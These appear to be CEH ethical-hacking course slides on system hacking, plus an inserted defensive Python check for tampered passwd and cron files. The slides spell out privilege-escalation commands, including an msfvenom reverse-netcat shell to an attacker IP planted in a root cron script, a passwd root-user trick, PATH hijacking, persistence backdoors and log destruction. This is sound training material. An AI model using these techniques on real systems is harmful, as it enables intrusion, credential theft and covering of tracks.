System Hacking PDF
Summary
This document provides an overview of system hacking techniques, including locating exploits, using Metasploit for exploitation, cracking passwords, privilege escalation and maintaining access.
Ethical Hacker Course – System Hacking
CEHv10 Certified Ethical Hacker Exam Study Guide
Edited by Djohara Benyamina

Agenda
- Exploits
- Exploitation Tools
- Password Cracking
- Post Exploitation

Exploits
- A vulnerability is a weakness in a system or piece of software
- An exploit is taking advantage of that vulnerability
- Exploits are also not always technical – humans are vulnerable and can be exploited
- Exploits can have multiple outcomes – it isn't always shell access

Locating exploits
- Often exploits are available publicly
- There are many repositories for exploits, including some you shouldn't trust (anything on the Tor network)
- Exploit-db.org is a trustworthy repository of exploits
- These are often considered proof of concept (PoC), just to demonstrate that a vulnerability can be exploited
- A local copy of the Exploit-DB can be installed on Linux systems, with a search tool – use searchsploit -m to get the exploit

Locating an exploit script on Kali (screenshot slide)

Locating an exploit script on Exploit-DB
- Search for a vulnerability exploit on Exploit-DB
- Locate the script and choose Raw {}
- Copy the link
- On Kali: wget

Locating an exploit script on GitHub
- Example of an exploit from GitHub: https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASbat/winPEAS.bat
- Click on Raw
- Copy the URL
- From Kali: # wget

Exploitation Tools
- There are many common exploitation tools, including Metasploit
- Metasploit has modules that can exploit vulnerabilities
- Commonly, modules target well-known vulnerabilities
- Modules are generally architecture and OS specific

Payloads
- The payload is the part of the exploit that is the code you want run
- Not all payloads are created equal; this has to do with size constraints on the specific payload
- Payloads are operating system and architecture (64-bit vs 32-bit) specific
- Metasploit has a custom payload called Meterpreter
- Meterpreter provides common functions that you'd use at the OS level

Using Metasploit
- The command line-oriented program is msfconsole; it comes installed in Kali Linux, ParrotOS (Linux) and Commando VM (Windows)
- You can get a web interface by downloading it from Rapid7
- Inside msfconsole, you search for modules using either their name, platform, CVE number or other identifying information
- Variables are set using set VAR val
- When all necessary variables are set, use exploit or run

Cracking Passwords
- Cracking passwords is a common technique that you would use after gaining access to a system
- John the Ripper is a common password cracking tool
- John supports multiple cracking methods
- Rainbow tables can be much faster since the password hashes are pre-computed, but they take up enormous disk space
- Mimikatz is a program (and Metasploit module) that can help with password cracking and is very commonly used by attackers

Grabbing Passwords
- You need passwords before cracking, so you need to pull them from your infiltrated system
- On Linux this would commonly be /etc/shadow; /etc/passwd is useful as well
- Windows uses the Security Account Manager (SAM), where passwords are stored in the registry
- Passwords can also be pulled from memory, which mimikatz is good at

Kerberoasting
- Password gathering technique on Windows networks
- Kerberos is an authorization protocol, using a client-server model
- Kerberoasting requires a compromised account on a victim computer
- Used to forge credentials to gain access to another system using a ticket-granting ticket

Post Exploitation
- Grab passwords
- Escalate privileges
- Perform reconnaissance on other systems
- Investigate the filesystem for juicy information (like passwords written in a text file) or RSA keys
- Meterpreter allows you to get a screen capture of the running desktop for proof of access

Privilege Escalation
- Escalating privileges is often necessary since most accounts will have limited permissions (principle of least privilege)
- Privilege escalation is obtaining administrator privileges from a non-privileged account
- It will typically require a local vulnerability that results in administrator access
- Keep in mind that all processes run with the security context of the user that owns the process
- It can be horizontal privilege escalation or vertical privilege escalation (privilege elevation)
- Horizontal: user to user; Vertical: user to admin (root)

A. Linux platform – Manual Enumeration
1. Exploit a writable /etc/passwd – add a new line for a user with a hash you create and set UID, GID and shell to root
   - Command to create a hash for a password: openssl passwd -1 -salt [salt] [password]
2. sudo -l: list what commands you're able to use as root on that account
   - How to exploit these commands? See exploits on https://gtfobins.github.io/
3. SUID – look for files with the SUID bit set (capabilities – files to be run as root)
   - Command to display SUID files: find / -perm -u=s -type f 2>/dev/null
   - Look for exploits on https://gtfobins.github.io/
4. Cron table – the cron daemon is a long-running process that executes commands at specific dates and times
   - cat /etc/crontab to see active cron jobs
   - Exploit the cron table for privilege elevation. Example: there is a script owned by root, named autoscript.sh, to be executed every 5 minutes
   - Steps: create a payload using one of the previous methods from Lab 7: msfvenom -p cmd/unix/reverse_netcat lhost=[Kali IP] lport=8888
   - echo [MSFVENOM OUTPUT] > autoscript.sh
   - Wait for cron to execute the file, with a netcat listener started using nc -lvnp 8888
5. PATH variable – can be exploited to elevate privileges by imitating an executable if its absolute path is not defined
   - Steps: echo $PATH
   - echo "[whatever command we want to run]" > [name of the executable we're imitating]
   - Save it in the folder /tmp and make it executable
   - Add the folder to PATH with the command export PATH=/tmp:$PATH
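A defender-side check for two of the footprints left by the Linux techniques above: a second UID 0 entry carrying an inline hash in a writable /etc/passwd, and a root cron job whose script non-root users can write (or that does not exist yet). This is an added example, not code from the CEH deck; it runs on a constructed passwd sample and a temporary directory tree, so the sample entries, the file names and the root_dir parameter are assumptions.

```python
import os
import stat
import tempfile
# Constructed /etc/passwd sample; the last line is the footprint of the
# writable /etc/passwd technique: a second UID 0 user with an inline hash.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup2:$1$xyz$constructedplaceholder:0:0:root:/root:/bin/bash
"""

def audit_passwd(text):
    """Return (user, reason) findings for passwd lines that look tampered."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # blank or malformed line, not a real entry
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "UID 0 account other than root"))
        if pw not in ("x", "*", "!", ""):  # anything else is an inline hash
            findings.append((user, "hash stored in passwd, not shadow"))
    return findings

def audit_crontab(text, root_dir="/"):
    """Flag root jobs whose script is missing or writable by group/other."""
    findings = []
    for line in text.splitlines():
        parts = line.split()  # min hour dom mon dow user command
        if line.startswith("#") or len(parts) < 7 or parts[5] != "root":
            continue  # comments, SHELL=/PATH= settings, non-root jobs
        path = os.path.join(root_dir, parts[6].lstrip("/"))
        if not os.path.exists(path):
            findings.append((parts[6], "root cron target missing"))
        elif os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((parts[6], "root cron script writable by non-root"))
    return findings

def build_demo_tree():
    # Constructed temp tree: one safe and one world-writable root cron script.
    root_dir = tempfile.mkdtemp()
    os.makedirs(os.path.join(root_dir, "opt"))
    for name, mode in (("safe.sh", 0o755), ("autoscript.sh", 0o777)):
        path = os.path.join(root_dir, "opt", name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\necho ok\n")
        os.chmod(path, mode)
    crontab = ("SHELL=/bin/sh\n*/5 * * * * root /opt/autoscript.sh\n"
               "0 3 * * * root /opt/safe.sh\n0 4 * * * root /opt/gone.sh\n")
    return root_dir, crontab
```

On a live host, feed the real /etc/passwd to audit_passwd and /etc/crontab to audit_crontab with the default root_dir; the constructed tree exists only to keep the example self-contained.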
Privilege Escalation using LinEnum
- LinEnum runs commands related to privilege escalation
- You can download a local copy of LinEnum using wget on the raw file at https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
- Start a Python HTTP server on Kali; the default port is 8000
- Get a foothold in the target, then try to escalate privileges
- From the victim machine, get the script from Kali
- Make the script executable
- Run the script
(A segment of LinEnum's output is shown on the slide)

B. Windows platform – Manual Enumeration
- User enumeration: start by enumerating users and their privileges on the target system
  - Current user's privileges: > whoami /priv
  - List users: > net users
  - List details of a user: > net user username
- Search for text files containing the "password" string: > findstr /si password *.txt
- Use Mimikatz to retrieve the NTLM password hash for a domain admin
- Collect system info: > systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- Look for open shares – SMB – use Enum4Linux
- Credential hunting and abusing account privileges – through accessing database servers and using Hydra
- Look for unquoted service paths and replace the legitimate application with a malicious one: > wmic service list brief | findstr "Running"
- A scheduled task that runs at predefined times with a privileged account can be modified. The schtasks command can be used to query scheduled tasks: schtasks /query /fo LIST /v
- If you have a Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester module to list vulnerabilities that may allow you to elevate your privileges

Many tools are available online to assist with enumerating Windows systems for common and obscure privilege escalation vectors:
- Seatbelt: C# project for performing a wide variety of local privilege escalation checks
- winPEAS: script that searches for possible paths to escalate privileges on Windows hosts
- PowerUp: common Windows privilege escalation vectors that rely on misconfigurations
- SharpUp: C# version of PowerUp
- JAWS: PowerShell script for enumerating privilege escalation vectors, written in PowerShell 2.0

Maintaining Access
- Persistence involves retaining access over time
- Common techniques include:
  - Adding a scheduled job or task – see crontab
  - Installing services or daemons
  - Installing a backdoor or trojan
  - Creating a new user – useradd
  - Creating RSA keys on Kali and sending the public key to authorized_keys on the target; you can then ssh with the private key from Kali

Pivoting
- Re-assess the surrounding network and systems using the tools previously used for reconnaissance
- Identify new targets that are visible and repeat the processes used thus far
- Using Metasploit – autoroute to pivot to another system
- Pivoting example (screenshot slide)

Cleanup
- Identify changes and evidence of exploits and penetration
- Remove or conceal the evidence
- Destroy logs, files, user accounts

Summary
- Exploits take advantage of weaknesses in systems or software (vulnerabilities)
- A database of exploits is available at exploit-db.org
- Metasploit is a common exploit framework
- Metasploit has many modules based on known vulnerabilities
- Password cracking is a common tactic used after gaining access to a system
- Post exploitation activities include privilege escalation, password grabbing, internal reconnaissance, etc.